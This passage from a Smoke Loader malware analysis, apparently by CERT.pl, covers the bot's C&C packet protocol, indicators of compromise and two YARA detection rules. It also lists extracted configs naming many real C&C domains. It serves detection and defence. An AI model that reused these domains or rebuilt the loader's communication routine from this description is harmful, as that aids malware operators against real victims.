obtaining a User Agent for IE version acquired by querying registry key\r\nSoftware\\Microsoft\\Internet Explorer and values svcVersion and Version. The obtained User\r\nAgent is used in later HTTP requests.\r\nNext, it tries to connect continuously to http://www.msftncsi.com/ncsi.txt until it gets a\r\nresponse, this way it makes sure that the machine is connected to the internet.\r\nFinallly, Smoke Loader begins its communication routine by sending a 10001 packet to the\r\nC\u0026C. It gets a response with a list of plugins to be installed and a number of tasks to be fetched.\r\nThe bot iterates over the task range and tries to get each task by sending a 10002 packet with the\r\ntask number as an argument.\r\nThe tasks payload is often not hosted on the C\u0026C server but on a different host and a Location\r\nheader with the real binary URL is returned instead.\r\nUpon execution of the task, a 10003 packet is sent back with arg_1 equal to task number and\r\narg_2 equal to 1 if the task executed succesfully.\r\nGraph representation of the communication between bot and C2\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 36 of 63\n\nGeneral IOCs\r\nProgram dumps itself to %APPDATA%\\Microsoft\\Windows\\[a-z]{8}\\[a-z]{8}.exe\r\nProgram creates a shortcut to itself in %APPDATA%\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\[a-z]{8}.lnk\r\nPerforms a System\\CurrentControlSet\\Services\\Disk\\Enum\\0 registry query\r\nGET requests to http://www.msftncsi.com/ncsi.txt\r\nPOST requests with HTTP 404 responses that include data\r\nExample request and response:\r\nYara rule:\r\nrule smokeloader: trojan\r\n{\r\nmeta:\r\nauthor = \"psrok1\"\r\nstrings:\r\n$fetch_cnc_url1 = { 80 3d [4] ?? 76 ?? c6 05 [4] 01 3? ?? a0 [4] 8b }\r\n$fetch_cnc_url2 = { a1 [4] 83 f? ?? 75 ?? 3? ?? a3 [4] 5? 8b }\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 37 of 63\n\n$wsprintf_msg = { a1 [4] 5? a1 [4] 5? 68 [4] 68 [4] 68 [4] [5-12] ff 15 }\r\n$nofmt_msg = { 8? ?? b? ?? 07 00 00 66 89 ?? 68 [4] 8d ?? 02 5? }\r\n$rc4_key_req = { 6a 04 5? [1-4] ff 75 ?? c7 45 [5] e8 }\r\n$rc4_key_resp = { c7 45 [5] e8 [4] 5? ff 15 [4] 83 c? 05 }\r\ncondition:\r\n2 of them or (1 of them and smokeloader_fmt)\r\n}\r\nrule smokeloader_2018: trojan {\r\nmeta:\r\nauthor = \"nazywam\"\r\nmodule = \"smokeloader\"\r\nstrings:\r\n$compose_packet = { E8 [4] 8B [1] B8 E2 07 00 00 68 [4] 8D }\r\n$load_cnc1 = { FF [5] 83 C4 30 8B CE E8 [4] 55 68 [4] FF [5] B9 [4] E8 }\r\n$load_cnc2 = { 8A [2] 88 [6] 84 DB 0F [5] B9 [4] E8 [4] 8B [5] 50 }\r\n$rc4_key_req = { 6A 1D 59 E8 [4] 80 [3] 00 00 00 01 8B [1] 8B [6] [11] 75 [1] 6A 04 55 8D }\r\n$rc4_key_resp = { 89 [3] 80 F9 3C 74 [1] 3B C8 7C [1] 3B C8 0F [5] 6A 04 51 8D [3] C7 }\r\ncondition:\r\nall of them\r\n}\r\nCollected IOCs\r\nMalware configs:\r\n[(u'smk_magic', 2015), (u'sample_id', u''), (u'domains', [{u'cnc': u''}, {u'cnc': u'http://makron.bit/'},\r\n{u'cnc': u'http://makronwin.bit/'}, {u'cnc': u'http://makron.site/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u''), (u'domains', [{u'cnc':\r\nu'http://alrashoudi.com/wp/k/index.php'}, {u'cnc': u'http://psoeiras.net/js/k/index.php'}, {u'cnc':\r\nu'http://twinrealty.com/vworker/k/index.php'}])]\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 38 of 63\n\n[(u'smk_magic', 2015), (u'sample_id', u'00004'), (u'domains', [{u'cnc': u'http://springhate.at/xptu/'},\r\n{u'cnc': u'http://springback.at/xptu/'}, {u'cnc': u'http://springbaha.at/xptu/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'0002'), (u'domains', [{u'cnc': u'http://cabrioboss.com/'},\r\n{u'cnc': u'http://zeronightmare.com/'}, {u'cnc': u'http://valakasdragon.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'0103'), (u'domains', [{u'cnc':\r\nu'http://businessnames1.4irc.com/'}, {u'cnc': u'http://businessnames2.4irc.com/'}, {u'cnc':\r\nu'http://businessnames3.4irc.com/'}, {u'cnc': u'http://businessnames4.4irc.com/'}, {u'cnc':\r\nu'http://businessnames5.4irc.com/'}, {u'cnc': u'http://businessnames6.4irc.com/'}, {u'cnc':\r\nu'http://businessnames7.4irc.com/'}, {u'cnc': u'http://businessnames8.4irc.com/'}, {u'cnc':\r\nu'http://businessnames9.4irc.com/'}, {u'cnc': u'http://businessnames10.4irc.com/'}, {u'cnc':\r\nu'http://businessnames11.4irc.com/'}, {u'cnc': u'http://businessnames12.4irc.com/'}, {u'cnc':\r\nu'http://businessnames13.4irc.com/'}, {u'cnc': u'http://businessnames14.4irc.com/'}, {u'cnc':\r\nu'http://businessnames15.4irc.com/'}, {u'cnc': u'http://businessnames16.4irc.com/'}, {u'cnc':\r\nu'http://businessnames17.4irc.com/'}, {u'cnc': u'http://businessnames18.4irc.com/'}, {u'cnc':\r\nu'http://businessnames19.4irc.com/'}, {u'cnc': u'http://businessnames20.4irc.com/'}, {u'cnc':\r\nu'http://businessnames21.4irc.com/'}, {u'cnc': u'http://businessnames22.4irc.com/'}, {u'cnc':\r\nu'http://businessnames23.4irc.com/'}, {u'cnc': u'http://businessnames24.4irc.com/'}, {u'cnc':\r\nu'http://businessnames25.4irc.com/'}, {u'cnc': u'http://businessnames26.4irc.com/'}, {u'cnc':\r\nu'http://businessnames27.4irc.com/'}, {u'cnc': u'http://businessnames28.4irc.com/'}, {u'cnc':\r\nu'http://businessnames29.4irc.com/'}, {u'cnc': u'http://businessnames30.4irc.com/'}, {u'cnc':\r\nu'http://businessnames31.4irc.com/'}, {u'cnc': u'http://businessnames32.4irc.com/'}, {u'cnc':\r\nu'http://businessnames33.4irc.com/'}, {u'cnc': u'http://businessnames34.4irc.com/'}, {u'cnc':\r\nu'http://businessnames35.4irc.com/'}, {u'cnc': u'http://businessnames36.4irc.com/'}, {u'cnc':\r\nu'http://businessnames37.4irc.com/'}, {u'cnc': u'http://businessnames38.4irc.com/'}, {u'cnc':\r\nu'http://businessnames39.4irc.com/'}, {u'cnc': u'http://businessnames40.4irc.com/'}, {u'cnc':\r\nu'http://businessnames41.4irc.com/'}, {u'cnc': u'http://businessnames42.4irc.com/'}, {u'cnc':\r\nu'http://businessnames43.4irc.com/'}, {u'cnc': u'http://businessnames44.4irc.com/'}, {u'cnc':\r\nu'http://businessnames45.4irc.com/'}, {u'cnc': u'http://businessnames46.4irc.com/'}, {u'cnc':\r\nu'http://businessnames47.4irc.com/'}, {u'cnc': u'http://businessnames48.4irc.com/'}, {u'cnc':\r\nu'http://businessnames49.4irc.com/'}, {u'cnc': u'http://businessnames50.4irc.com/'}, {u'cnc':\r\nu'http://businessnames51.4irc.com/'}, {u'cnc': u'http://businessnames52.4irc.com/'}, {u'cnc':\r\nu'http://businessnames53.4irc.com/'}, {u'cnc': u'http://businessnames54.4irc.com/'}, {u'cnc':\r\nu'http://businessnames55.4irc.com/'}, {u'cnc': u'http://businessnames56.4irc.com/'}, {u'cnc':\r\nu'http://businessnames57.4irc.com/'}, {u'cnc': u'http://businessnames58.4irc.com/'}, {u'cnc':\r\nu'http://businessnames59.4irc.com/'}, {u'cnc': u'http://businessnames60.4irc.com/'}, {u'cnc':\r\nu'http://businessnames61.4irc.com/'}, {u'cnc': u'http://businessnames62.4irc.com/'}, {u'cnc':\r\nu'http://businessnames63.4irc.com/'}, {u'cnc': u'http://businessnames64.4irc.com/'}, {u'cnc':\r\nu'http://businessnames65.4irc.com/'}, {u'cnc': u'http://businessnames66.4irc.com/'}, {u'cnc':\r\nu'http://businessnames67.4irc.com/'}, {u'cnc': u'http://businessnames68.4irc.com/'}, {u'cnc':\r\nu'http://businessnames69.4irc.com/'}, {u'cnc': u'http://businessnames70.4irc.com/'}, {u'cnc':\r\nu'http://businessnames71.4irc.com/'}, {u'cnc': u'http://businessnames72.4irc.com/'}, {u'cnc':\r\nu'http://businessnames73.4irc.com/'}, {u'cnc': u'http://businessnames74.4irc.com/'}, {u'cnc':\r\nu'http://businessnames75.4irc.com/'}, {u'cnc': u'http://businessnames76.4irc.com/'}, {u'cnc':\r\nu'http://businessnames77.4irc.com/'}, {u'cnc': u'http://businessnames78.4irc.com/'}, {u'cnc':\r\nu'http://businessnames79.4irc.com/'}, {u'cnc': u'http://businessnames80.4irc.com/'}, {u'cnc':\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 39 of 63\n\nu'http://businessnames81.4irc.com/'}, {u'cnc': u'http://businessnames82.4irc.com/'}, {u'cnc':\r\nu'http://businessnames83.4irc.com/'}, {u'cnc': u'http://businessnames84.4irc.com/'}, {u'cnc':\r\nu'http://businessnames85.4irc.com/'}, {u'cnc': u'http://businessnames86.4irc.com/'}, {u'cnc':\r\nu'http://businessnames87.4irc.com/'}, {u'cnc': u'http://businessnames88.4irc.com/'}, {u'cnc':\r\nu'http://businessnames89.4irc.com/'}, {u'cnc': u'http://businessnames90.4irc.com/'}, {u'cnc':\r\nu'http://businessnames91.4irc.com/'}, {u'cnc': u'http://businessnames92.4irc.com/'}, {u'cnc':\r\nu'http://businessnames93.4irc.com/'}, {u'cnc': u'http://businessnames94.4irc.com/'}, {u'cnc':\r\nu'http://businessnames95.4irc.com/'}, {u'cnc': u'http://businessnames96.4irc.com/'}, {u'cnc':\r\nu'http://businessnames97.4irc.com/'}, {u'cnc': u'http://businessnames98.4irc.com/'}, {u'cnc':\r\nu'http://businessnames99.4irc.com/'}, {u'cnc': u'http://businessnames100.4irc.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'0115'), (u'domains', [{u'cnc':\r\nu'http://alrashoudi.com/wp/k/index.php'}, {u'cnc': u'http://psoeiras.net/js/k/index.php'}, {u'cnc':\r\nu'http://twinrealty.com/vworker/k/index.php'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'0504'), (u'domains', [{u'cnc':\r\nu'http://businessnames1.4irc.com/'}, {u'cnc': u'http://businessnames2.4irc.com/'}, {u'cnc':\r\nu'http://businessnames3.4irc.com/'}, {u'cnc': u'http://businessnames4.4irc.com/'}, {u'cnc':\r\nu'http://businessnames5.4irc.com/'}, {u'cnc': u'http://businessnames6.4irc.com/'}, {u'cnc':\r\nu'http://businessnames7.4irc.com/'}, {u'cnc': u'http://businessnames8.4irc.com/'}, {u'cnc':\r\nu'http://businessnames9.4irc.com/'}, {u'cnc': u'http://businessnames10.4irc.com/'}, {u'cnc':\r\nu'http://businessnames11.4irc.com/'}, {u'cnc': u'http://businessnames12.4irc.com/'}, {u'cnc':\r\nu'http://businessnames13.4irc.com/'}, {u'cnc': u'http://businessnames14.4irc.com/'}, {u'cnc':\r\nu'http://businessnames15.4irc.com/'}, {u'cnc': u'http://businessnames16.4irc.com/'}, {u'cnc':\r\nu'http://businessnames17.4irc.com/'}, {u'cnc': u'http://businessnames18.4irc.com/'}, {u'cnc':\r\nu'http://businessnames19.4irc.com/'}, {u'cnc': u'http://businessnames20.4irc.com/'}, {u'cnc':\r\nu'http://businessnames21.4irc.com/'}, {u'cnc': u'http://businessnames22.4irc.com/'}, {u'cnc':\r\nu'http://businessnames23.4irc.com/'}, {u'cnc': u'http://businessnames24.4irc.com/'}, {u'cnc':\r\nu'http://businessnames25.4irc.com/'}, {u'cnc': u'http://businessnames26.4irc.com/'}, {u'cnc':\r\nu'http://businessnames27.4irc.com/'}, {u'cnc': u'http://businessnames28.4irc.com/'}, {u'cnc':\r\nu'http://businessnames29.4irc.com/'}, {u'cnc': u'http://businessnames30.4irc.com/'}, {u'cnc':\r\nu'http://businessnames31.4irc.com/'}, {u'cnc': u'http://businessnames32.4irc.com/'}, {u'cnc':\r\nu'http://businessnames33.4irc.com/'}, {u'cnc': u'http://businessnames34.4irc.com/'}, {u'cnc':\r\nu'http://businessnames35.4irc.com/'}, {u'cnc': u'http://businessnames36.4irc.com/'}, {u'cnc':\r\nu'http://businessnames37.4irc.com/'}, {u'cnc': u'http://businessnames38.4irc.com/'}, {u'cnc':\r\nu'http://businessnames39.4irc.com/'}, {u'cnc': u'http://businessnames40.4irc.com/'}, {u'cnc':\r\nu'http://businessnames41.4irc.com/'}, {u'cnc': u'http://businessnames42.4irc.com/'}, {u'cnc':\r\nu'http://businessnames43.4irc.com/'}, {u'cnc': u'http://businessnames44.4irc.com/'}, {u'cnc':\r\nu'http://businessnames45.4irc.com/'}, {u'cnc': u'http://businessnames46.4irc.com/'}, {u'cnc':\r\nu'http://businessnames47.4irc.com/'}, {u'cnc': u'http://businessnames48.4irc.com/'}, {u'cnc':\r\nu'http://businessnames49.4irc.com/'}, {u'cnc': u'http://businessnames50.4irc.com/'}, {u'cnc':\r\nu'http://businessnames51.4irc.com/'}, {u'cnc': u'http://businessnames52.4irc.com/'}, {u'cnc':\r\nu'http://businessnames53.4irc.com/'}, {u'cnc': u'http://businessnames54.4irc.com/'}, {u'cnc':\r\nu'http://businessnames55.4irc.com/'}, {u'cnc': u'http://businessnames56.4irc.com/'}, {u'cnc':\r\nu'http://businessnames57.4irc.com/'}, {u'cnc': u'http://businessnames58.4irc.com/'}, {u'cnc':\r\nu'http://businessnames59.4irc.com/'}, {u'cnc': u'http://businessnames60.4irc.com/'}, {u'cnc':\r\nu'http://businessnames61.4irc.com/'}, {u'cnc': u'http://businessnames62.4irc.com/'}, {u'cnc':\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 40 of 63\n\nu'http://businessnames63.4irc.com/'}, {u'cnc': u'http://businessnames64.4irc.com/'}, {u'cnc':\r\nu'http://businessnames65.4irc.com/'}, {u'cnc': u'http://businessnames66.4irc.com/'}, {u'cnc':\r\nu'http://businessnames67.4irc.com/'}, {u'cnc': u'http://businessnames68.4irc.com/'}, {u'cnc':\r\nu'http://businessnames69.4irc.com/'}, {u'cnc': u'http://businessnames70.4irc.com/'}, {u'cnc':\r\nu'http://businessnames71.4irc.com/'}, {u'cnc': u'http://businessnames72.4irc.com/'}, {u'cnc':\r\nu'http://businessnames73.4irc.com/'}, {u'cnc': u'http://businessnames74.4irc.com/'}, {u'cnc':\r\nu'http://businessnames75.4irc.com/'}, {u'cnc': u'http://businessnames76.4irc.com/'}, {u'cnc':\r\nu'http://businessnames77.4irc.com/'}, {u'cnc': u'http://businessnames78.4irc.com/'}, {u'cnc':\r\nu'http://businessnames79.4irc.com/'}, {u'cnc': u'http://businessnames80.4irc.com/'}, {u'cnc':\r\nu'http://businessnames81.4irc.com/'}, {u'cnc': u'http://businessnames82.4irc.com/'}, {u'cnc':\r\nu'http://businessnames83.4irc.com/'}, {u'cnc': u'http://businessnames84.4irc.com/'}, {u'cnc':\r\nu'http://businessnames85.4irc.com/'}, {u'cnc': u'http://businessnames86.4irc.com/'}, {u'cnc':\r\nu'http://businessnames87.4irc.com/'}, {u'cnc': u'http://businessnames88.4irc.com/'}, {u'cnc':\r\nu'http://businessnames89.4irc.com/'}, {u'cnc': u'http://businessnames90.4irc.com/'}, {u'cnc':\r\nu'http://businessnames91.4irc.com/'}, {u'cnc': u'http://businessnames92.4irc.com/'}, {u'cnc':\r\nu'http://businessnames93.4irc.com/'}, {u'cnc': u'http://businessnames94.4irc.com/'}, {u'cnc':\r\nu'http://businessnames95.4irc.com/'}, {u'cnc': u'http://businessnames96.4irc.com/'}, {u'cnc':\r\nu'http://businessnames97.4irc.com/'}, {u'cnc': u'http://businessnames98.4irc.com/'}, {u'cnc':\r\nu'http://businessnames99.4irc.com/'}, {u'cnc': u'http://businessnames100.4irc.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'0602'), (u'domains', [{u'cnc':\r\nu'http://businessnames1.4irc.com/'}, {u'cnc': u'http://businessnames2.4irc.com/'}, {u'cnc':\r\nu'http://businessnames3.4irc.com/'}, {u'cnc': u'http://businessnames4.4irc.com/'}, {u'cnc':\r\nu'http://businessnames5.4irc.com/'}, {u'cnc': u'http://businessnames6.4irc.com/'}, {u'cnc':\r\nu'http://businessnames7.4irc.com/'}, {u'cnc': u'http://businessnames8.4irc.com/'}, {u'cnc':\r\nu'http://businessnames9.4irc.com/'}, {u'cnc': u'http://businessnames10.4irc.com/'}, {u'cnc':\r\nu'http://businessnames11.4irc.com/'}, {u'cnc': u'http://businessnames12.4irc.com/'}, {u'cnc':\r\nu'http://businessnames13.4irc.com/'}, {u'cnc': u'http://businessnames14.4irc.com/'}, {u'cnc':\r\nu'http://businessnames15.4irc.com/'}, {u'cnc': u'http://businessnames16.4irc.com/'}, {u'cnc':\r\nu'http://businessnames17.4irc.com/'}, {u'cnc': u'http://businessnames18.4irc.com/'}, {u'cnc':\r\nu'http://businessnames19.4irc.com/'}, {u'cnc': u'http://businessnames20.4irc.com/'}, {u'cnc':\r\nu'http://businessnames21.4irc.com/'}, {u'cnc': u'http://businessnames22.4irc.com/'}, {u'cnc':\r\nu'http://businessnames23.4irc.com/'}, {u'cnc': u'http://businessnames24.4irc.com/'}, {u'cnc':\r\nu'http://businessnames25.4irc.com/'}, {u'cnc': u'http://businessnames26.4irc.com/'}, {u'cnc':\r\nu'http://businessnames27.4irc.com/'}, {u'cnc': u'http://businessnames28.4irc.com/'}, {u'cnc':\r\nu'http://businessnames29.4irc.com/'}, {u'cnc': u'http://businessnames30.4irc.com/'}, {u'cnc':\r\nu'http://businessnames31.4irc.com/'}, {u'cnc': u'http://businessnames32.4irc.com/'}, {u'cnc':\r\nu'http://businessnames33.4irc.com/'}, {u'cnc': u'http://businessnames34.4irc.com/'}, {u'cnc':\r\nu'http://businessnames35.4irc.com/'}, {u'cnc': u'http://businessnames36.4irc.com/'}, {u'cnc':\r\nu'http://businessnames37.4irc.com/'}, {u'cnc': u'http://businessnames38.4irc.com/'}, {u'cnc':\r\nu'http://businessnames39.4irc.com/'}, {u'cnc': u'http://businessnames40.4irc.com/'}, {u'cnc':\r\nu'http://businessnames41.4irc.com/'}, {u'cnc': u'http://businessnames42.4irc.com/'}, {u'cnc':\r\nu'http://businessnames43.4irc.com/'}, {u'cnc': u'http://businessnames44.4irc.com/'}, {u'cnc':\r\nu'http://businessnames45.4irc.com/'}, {u'cnc': u'http://businessnames46.4irc.com/'}, {u'cnc':\r\nu'http://businessnames47.4irc.com/'}, {u'cnc': u'http://businessnames48.4irc.com/'}, {u'cnc':\r\nu'http://businessnames49.4irc.com/'}, {u'cnc': u'http://businessnames50.4irc.com/'}, {u'cnc':\r\nu'http://businessnames51.4irc.com/'}, {u'cnc': u'http://businessnames52.4irc.com/'}, {u'cnc':\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 41 of 63\n\nu'http://businessnames53.4irc.com/'}, {u'cnc': u'http://businessnames54.4irc.com/'}, {u'cnc':\r\nu'http://businessnames55.4irc.com/'}, {u'cnc': u'http://businessnames56.4irc.com/'}, {u'cnc':\r\nu'http://businessnames57.4irc.com/'}, {u'cnc': u'http://businessnames58.4irc.com/'}, {u'cnc':\r\nu'http://businessnames59.4irc.com/'}, {u'cnc': u'http://businessnames60.4irc.com/'}, {u'cnc':\r\nu'http://businessnames61.4irc.com/'}, {u'cnc': u'http://businessnames62.4irc.com/'}, {u'cnc':\r\nu'http://businessnames63.4irc.com/'}, {u'cnc': u'http://businessnames64.4irc.com/'}, {u'cnc':\r\nu'http://businessnames65.4irc.com/'}, {u'cnc': u'http://businessnames66.4irc.com/'}, {u'cnc':\r\nu'http://businessnames67.4irc.com/'}, {u'cnc': u'http://businessnames68.4irc.com/'}, {u'cnc':\r\nu'http://businessnames69.4irc.com/'}, {u'cnc': u'http://businessnames70.4irc.com/'}, {u'cnc':\r\nu'http://businessnames71.4irc.com/'}, {u'cnc': u'http://businessnames72.4irc.com/'}, {u'cnc':\r\nu'http://businessnames73.4irc.com/'}, {u'cnc': u'http://businessnames74.4irc.com/'}, {u'cnc':\r\nu'http://businessnames75.4irc.com/'}, {u'cnc': u'http://businessnames76.4irc.com/'}, {u'cnc':\r\nu'http://businessnames77.4irc.com/'}, {u'cnc': u'http://businessnames78.4irc.com/'}, {u'cnc':\r\nu'http://businessnames79.4irc.com/'}, {u'cnc': u'http://businessnames80.4irc.com/'}, {u'cnc':\r\nu'http://businessnames81.4irc.com/'}, {u'cnc': u'http://businessnames82.4irc.com/'}, {u'cnc':\r\nu'http://businessnames83.4irc.com/'}, {u'cnc': u'http://businessnames84.4irc.com/'}, {u'cnc':\r\nu'http://businessnames85.4irc.com/'}, {u'cnc': u'http://businessnames86.4irc.com/'}, {u'cnc':\r\nu'http://businessnames87.4irc.com/'}, {u'cnc': u'http://businessnames88.4irc.com/'}, {u'cnc':\r\nu'http://businessnames89.4irc.com/'}, {u'cnc': u'http://businessnames90.4irc.com/'}, {u'cnc':\r\nu'http://businessnames91.4irc.com/'}, {u'cnc': u'http://businessnames92.4irc.com/'}, {u'cnc':\r\nu'http://businessnames93.4irc.com/'}, {u'cnc': u'http://businessnames94.4irc.com/'}, {u'cnc':\r\nu'http://businessnames95.4irc.com/'}, {u'cnc': u'http://businessnames96.4irc.com/'}, {u'cnc':\r\nu'http://businessnames97.4irc.com/'}, {u'cnc': u'http://businessnames98.4irc.com/'}, {u'cnc':\r\nu'http://businessnames99.4irc.com/'}, {u'cnc': u'http://businessnames100.4irc.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'0803'), (u'domains', [{u'cnc':\r\nu'http://businessnames1.4irc.com/'}, {u'cnc': u'http://businessnames2.4irc.com/'}, {u'cnc':\r\nu'http://businessnames3.4irc.com/'}, {u'cnc': u'http://businessnames4.4irc.com/'}, {u'cnc':\r\nu'http://businessnames5.4irc.com/'}, {u'cnc': u'http://businessnames6.4irc.com/'}, {u'cnc':\r\nu'http://businessnames7.4irc.com/'}, {u'cnc': u'http://businessnames8.4irc.com/'}, {u'cnc':\r\nu'http://businessnames9.4irc.com/'}, {u'cnc': u'http://businessnames10.4irc.com/'}, {u'cnc':\r\nu'http://businessnames11.4irc.com/'}, {u'cnc': u'http://businessnames12.4irc.com/'}, {u'cnc':\r\nu'http://businessnames13.4irc.com/'}, {u'cnc': u'http://businessnames14.4irc.com/'}, {u'cnc':\r\nu'http://businessnames15.4irc.com/'}, {u'cnc': u'http://businessnames16.4irc.com/'}, {u'cnc':\r\nu'http://businessnames17.4irc.com/'}, {u'cnc': u'http://businessnames18.4irc.com/'}, {u'cnc':\r\nu'http://businessnames19.4irc.com/'}, {u'cnc': u'http://businessnames20.4irc.com/'}, {u'cnc':\r\nu'http://businessnames21.4irc.com/'}, {u'cnc': u'http://businessnames22.4irc.com/'}, {u'cnc':\r\nu'http://businessnames23.4irc.com/'}, {u'cnc': u'http://businessnames24.4irc.com/'}, {u'cnc':\r\nu'http://businessnames25.4irc.com/'}, {u'cnc': u'http://businessnames26.4irc.com/'}, {u'cnc':\r\nu'http://businessnames27.4irc.com/'}, {u'cnc': u'http://businessnames28.4irc.com/'}, {u'cnc':\r\nu'http://businessnames29.4irc.com/'}, {u'cnc': u'http://businessnames30.4irc.com/'}, {u'cnc':\r\nu'http://businessnames31.4irc.com/'}, {u'cnc': u'http://businessnames32.4irc.com/'}, {u'cnc':\r\nu'http://businessnames33.4irc.com/'}, {u'cnc': u'http://businessnames34.4irc.com/'}, {u'cnc':\r\nu'http://businessnames35.4irc.com/'}, {u'cnc': u'http://businessnames36.4irc.com/'}, {u'cnc':\r\nu'http://businessnames37.4irc.com/'}, {u'cnc': u'http://businessnames38.4irc.com/'}, {u'cnc':\r\nu'http://businessnames39.4irc.com/'}, {u'cnc': u'http://businessnames40.4irc.com/'}, {u'cnc':\r\nu'http://businessnames41.4irc.com/'}, {u'cnc': u'http://businessnames42.4irc.com/'}, {u'cnc':\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 42 of 63\n\nu'http://businessnames43.4irc.com/'}, {u'cnc': u'http://businessnames44.4irc.com/'}, {u'cnc':\r\nu'http://businessnames45.4irc.com/'}, {u'cnc': u'http://businessnames46.4irc.com/'}, {u'cnc':\r\nu'http://businessnames47.4irc.com/'}, {u'cnc': u'http://businessnames48.4irc.com/'}, {u'cnc':\r\nu'http://businessnames49.4irc.com/'}, {u'cnc': u'http://businessnames50.4irc.com/'}, {u'cnc':\r\nu'http://businessnames51.4irc.com/'}, {u'cnc': u'http://businessnames52.4irc.com/'}, {u'cnc':\r\nu'http://businessnames53.4irc.com/'}, {u'cnc': u'http://businessnames54.4irc.com/'}, {u'cnc':\r\nu'http://businessnames55.4irc.com/'}, {u'cnc': u'http://businessnames56.4irc.com/'}, {u'cnc':\r\nu'http://businessnames57.4irc.com/'}, {u'cnc': u'http://businessnames58.4irc.com/'}, {u'cnc':\r\nu'http://businessnames59.4irc.com/'}, {u'cnc': u'http://businessnames60.4irc.com/'}, {u'cnc':\r\nu'http://businessnames61.4irc.com/'}, {u'cnc': u'http://businessnames62.4irc.com/'}, {u'cnc':\r\nu'http://businessnames63.4irc.com/'}, {u'cnc': u'http://businessnames64.4irc.com/'}, {u'cnc':\r\nu'http://businessnames65.4irc.com/'}, {u'cnc': u'http://businessnames66.4irc.com/'}, {u'cnc':\r\nu'http://businessnames67.4irc.com/'}, {u'cnc': u'http://businessnames68.4irc.com/'}, {u'cnc':\r\nu'http://businessnames69.4irc.com/'}, {u'cnc': u'http://businessnames70.4irc.com/'}, {u'cnc':\r\nu'http://businessnames71.4irc.com/'}, {u'cnc': u'http://businessnames72.4irc.com/'}, {u'cnc':\r\nu'http://businessnames73.4irc.com/'}, {u'cnc': u'http://businessnames74.4irc.com/'}, {u'cnc':\r\nu'http://businessnames75.4irc.com/'}, {u'cnc': u'http://businessnames76.4irc.com/'}, {u'cnc':\r\nu'http://businessnames77.4irc.com/'}, {u'cnc': u'http://businessnames78.4irc.com/'}, {u'cnc':\r\nu'http://businessnames79.4irc.com/'}, {u'cnc': u'http://businessnames80.4irc.com/'}, {u'cnc':\r\nu'http://businessnames81.4irc.com/'}, {u'cnc': u'http://businessnames82.4irc.com/'}, {u'cnc':\r\nu'http://businessnames83.4irc.com/'}, {u'cnc': u'http://businessnames84.4irc.com/'}, {u'cnc':\r\nu'http://businessnames85.4irc.com/'}, {u'cnc': u'http://businessnames86.4irc.com/'}, {u'cnc':\r\nu'http://businessnames87.4irc.com/'}, {u'cnc': u'http://businessnames88.4irc.com/'}, {u'cnc':\r\nu'http://businessnames89.4irc.com/'}, {u'cnc': u'http://businessnames90.4irc.com/'}, {u'cnc':\r\nu'http://businessnames91.4irc.com/'}, {u'cnc': u'http://businessnames92.4irc.com/'}, {u'cnc':\r\nu'http://businessnames93.4irc.com/'}, {u'cnc': u'http://businessnames94.4irc.com/'}, {u'cnc':\r\nu'http://businessnames95.4irc.com/'}, {u'cnc': u'http://businessnames96.4irc.com/'}, {u'cnc':\r\nu'http://businessnames97.4irc.com/'}, {u'cnc': u'http://businessnames98.4irc.com/'}, {u'cnc':\r\nu'http://businessnames99.4irc.com/'}, {u'cnc': u'http://businessnames100.4irc.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'10057'), (u'domains', [{u'cnc': u'http://burbulator.bit/'}, {u'cnc':\r\nu'http://burbulator.bit/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'10k'), (u'domains', [{u'cnc':\r\nu'http://mailserv.xsayeszhaifa.bit/hosting2/'}, {u'cnc': u'http://mailserv.nutsystem323z.bit/hosting2/'},\r\n{u'cnc': u'http://mailserv.nutsystem324z.bit/hosting2/'}, {u'cnc':\r\nu'http://mailserv.nutsystem325z.bit/hosting2/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'11111'), (u'domains', [{u'cnc': u'http://hsbc-auth-2.ru/smk/index.php'}, {u'cnc': u'http://wasduherwasgu.net/smk/index.php'}, {u'cnc':\r\nu'http://tanenzwut-tan.su/smk/index.php'}, {u'cnc': u'http://libersmicshliber.com/smk/index.php'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'11111'), (u'domains', [{u'cnc':\r\nu'http://kooldoomroom.net/ww/hok/index.php'}, {u'cnc':\r\nu'http://kooldoomroom.biz/ww/hok/index.php'}, {u'cnc':\r\nu'http://kooldoomroom.online/ww/hok/index.php'}, {u'cnc':\r\nu'http://kooldoomroom.tech/ww/hok/index.php'}, {u'cnc':\r\nu'http://kooldoomroom.org/ww/hok/index.php'}])]\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 43 of 63\n\n[(u'smk_magic', 2015), (u'sample_id', u'1203'), (u'domains', [{u'cnc':\r\nu'http://businessnames1.4irc.com/'}, {u'cnc': u'http://businessnames2.4irc.com/'}, {u'cnc':\r\nu'http://businessnames3.4irc.com/'}, {u'cnc': u'http://businessnames4.4irc.com/'}, {u'cnc':\r\nu'http://businessnames5.4irc.com/'}, {u'cnc': u'http://businessnames6.4irc.com/'}, {u'cnc':\r\nu'http://businessnames7.4irc.com/'}, {u'cnc': u'http://businessnames8.4irc.com/'}, {u'cnc':\r\nu'http://businessnames9.4irc.com/'}, {u'cnc': u'http://businessnames10.4irc.com/'}, {u'cnc':\r\nu'http://businessnames11.4irc.com/'}, {u'cnc': u'http://businessnames12.4irc.com/'}, {u'cnc':\r\nu'http://businessnames13.4irc.com/'}, {u'cnc': u'http://businessnames14.4irc.com/'}, {u'cnc':\r\nu'http://businessnames15.4irc.com/'}, {u'cnc': 